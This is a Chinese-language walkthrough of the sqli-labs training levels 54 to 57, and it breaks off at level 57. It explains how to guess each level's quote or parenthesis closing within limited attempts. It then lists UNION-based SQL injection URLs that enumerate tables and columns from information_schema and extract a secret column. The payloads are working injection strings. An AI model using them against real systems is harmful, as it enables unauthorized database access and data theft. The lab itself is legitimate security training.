第54关:
根据这一关的提示,我们可以知道数据库的名字“chellenges”,我们需要知道“dump”的密码,才能通关,而且只有10次尝试机会
因为只有10次机会,所以判断闭合时需要猜测最常见的,所以先判断单引号、然后双引号、整形、最后括号
闭合方式:
/Less-54/?id=-1' union select 1,2,3--+
因为一直到库名,需要判断表名,注意语句要一次正确,可以在数据库中先测试是否正确
/Less-54/?id=-1' union all select 1,group_concat(table_name),3 from information_schema.tables where table_schema='challenges'--+
然后找出所有的列
192.168.31.9:8089/Less-54/?id=-1' union all select 1,group_concat(column_name),3 from information_schema.columns where table_name='53TFB5MZYC'--+
更具列爆出密码
/Less-54/?id=-1' union all select 1,group_concat(secret_2HIN),3 from 53TFB5MZYC --+
爆出密码后,将密码输入,这关就成功了
第55关:
这关与上一关一样,但是这一关用的闭合方式是“)”,确实是试了很多次才试出来,知道闭合方式以后,sql注入方式就和上一关一样了
注入sql:
/Less-55/?id=-1) union all select 1,group_concat(table_name),3 from information_schema.tables where table_schema='challenges'--+
第56关:
注入sql:
/Less-56/?id=-1') union all select 1,group_concat(table_name),3 from information_schema.tables where table_schema='challenges'--+
第57关:
注入sql:
/Less-